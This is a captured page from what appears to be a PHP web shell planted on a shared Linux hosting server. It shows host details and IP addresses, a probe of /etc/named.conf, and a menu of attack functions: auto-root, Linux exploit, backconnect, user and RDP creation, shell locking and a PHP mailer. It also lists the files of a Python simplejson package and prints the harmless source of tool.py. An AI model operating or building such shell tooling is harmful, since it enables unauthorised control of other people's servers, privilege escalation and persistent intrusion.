Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.118
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
site-packages /
simplejson /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
tests
[ DIR ]
drwxr-xr-x
__init__.py
23.14
KB
-rw-r--r--
__init__.pyc
21.39
KB
-rw-r--r--
__init__.pyo
21.39
KB
-rw-r--r--
_speedups.so
46.59
KB
-rwxr-xr-x
compat.py
931
B
-rw-r--r--
compat.pyc
1.65
KB
-rw-r--r--
compat.pyo
1.65
KB
-rw-r--r--
decoder.py
14.24
KB
-rw-r--r--
decoder.pyc
12.2
KB
-rw-r--r--
decoder.pyo
12.2
KB
-rw-r--r--
encoder.py
26.84
KB
-rw-r--r--
encoder.pyc
21.08
KB
-rw-r--r--
encoder.pyo
21.08
KB
-rw-r--r--
ordered_dict.py
2.88
KB
-rw-r--r--
ordered_dict.pyc
4.75
KB
-rw-r--r--
ordered_dict.pyo
4.75
KB
-rw-r--r--
scanner.py
4.54
KB
-rw-r--r--
scanner.pyc
4.98
KB
-rw-r--r--
scanner.pyo
4.98
KB
-rw-r--r--
tool.py
1.11
KB
-rw-r--r--
tool.pyc
1.41
KB
-rw-r--r--
tool.pyo
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tool.py
r"""Command-line tool to validate and pretty-print JSON Usage:: $ echo '{"json":"obj"}' | python -m simplejson.tool { "json": "obj" } $ echo '{ 1.2:3.4}' | python -m simplejson.tool Expecting property name: line 1 column 2 (char 2) """ from __future__ import with_statement import sys import simplejson as json def main(): if len(sys.argv) == 1: infile = sys.stdin outfile = sys.stdout elif len(sys.argv) == 2: infile = open(sys.argv[1], 'r') outfile = sys.stdout elif len(sys.argv) == 3: infile = open(sys.argv[1], 'r') outfile = open(sys.argv[2], 'w') else: raise SystemExit(sys.argv[0] + " [infile [outfile]]") with infile: try: obj = json.load(infile, object_pairs_hook=json.OrderedDict, use_decimal=True) except ValueError: raise SystemExit(sys.exc_info()[1]) with outfile: json.dump(obj, outfile, sort_keys=True, indent=' ', use_decimal=True) outfile.write('\n') if __name__ == '__main__': main()
Close